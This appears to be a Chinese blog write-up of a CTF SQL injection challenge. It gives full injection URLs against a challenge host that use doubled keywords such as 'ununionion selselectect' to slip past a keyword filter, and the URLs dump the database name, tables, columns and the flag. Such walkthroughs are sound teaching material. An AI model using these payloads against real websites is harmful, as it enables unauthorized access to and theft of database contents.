CTF论剑场-SQL注入~~~

2019年8月3日23:18:36 评论 412

根据题目提示,这道题是个SQL注入题,于是我们直接试探SQL注入,看到页面有个list点开看看

CTF论剑场-SQL注入~~~

看着链接的样子就是有SQL注入的样子,哈哈哈,接下来让试试它过滤了啥,怎么闭合吧。通过测试发现,过滤了and 、or、select、union,最后试出来列数量是3,如下图:

CTF论剑场-SQL注入~~~

接下来,爆数据库
http://123.206.31.85:10018/list.php?id=-2' ununionion selselectect 1,database(),3--+
数据库名为web18

CTF论剑场-SQL注入~~~

继续,爆表名

http://123.206.31.85:10018/list.php?id=-2' ununionion selselectect 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='web18'--+

CTF论剑场-SQL注入~~~

爆字段名:
http://123.206.31.85:10018/list.php?id=-2' ununionion selselectect 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='web18'--+

CTF论剑场-SQL注入~~~

爆字段:
http://123.206.31.85:10018/list.php?id=-1' anandd 1=1 uniunionon seleselectct 1,flag,3 from flag--+

CTF论剑场-SQL注入~~~

http://www.oniont.cn/index.php/archives/48.html

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: